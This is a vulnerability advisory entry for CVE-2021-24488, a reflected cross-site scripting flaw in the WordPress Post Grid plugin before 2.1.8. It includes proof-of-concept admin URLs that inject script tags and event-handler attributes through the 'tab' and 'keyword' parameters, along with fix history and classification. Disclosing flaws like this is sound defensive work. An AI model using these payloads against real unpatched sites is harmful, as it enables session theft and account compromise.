WordPress Plugin Vulnerabilities

Post Grid < 2.1.8 - Reflected Cross-Site Scripting (XSS)

Description

The slider import search feature and tab parameter of the plugin settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues

Proof of Concept

https://example.com/wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="><script>alert(1)</script>
https://example.com/wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(1)//

v 2.1.4 partially fixed the issue, still allowing arbitrary attributes to be injected, ie
https://example.com/wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="+accesskey=X+onclick=alert(1)//

v2.1.5 removed a lot of escaping done in 2.1.4, and was put back in v2.1.8

Affects Plugins

Plugin icon
post-grid
Fixed in 2.1.8

References

CVE
CVE-2021-24488

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Original Researcher
0xB9
Submitter twitter
0xB9sec
Verified
Yes
WPVDB ID
1fc0aace-ba85-4939-9007-d150960add4a

Timeline

Publicly Published
2021-06-28 (about 2 years ago)
Added
2021-06-28 (about 2 years ago)
Last Updated
2022-01-02 (about 1 years ago)

Other

Published
Title
Published
2022-06-13
Title
Gallery < 2.0.0 - Reflected Cross-Site Scripting
Published
2023-10-02
Title
Click To Tweet <= 2.0.14 - Reflected XSS
Published
2020-04-22
Title
Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS
Published
2023-11-13
Title
WooCommerce Product Carousel Slider <= 3.3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Published
2018-03-15
Title
Duplicator <= 1.2.32 - Cross-Site Scripting (XSS)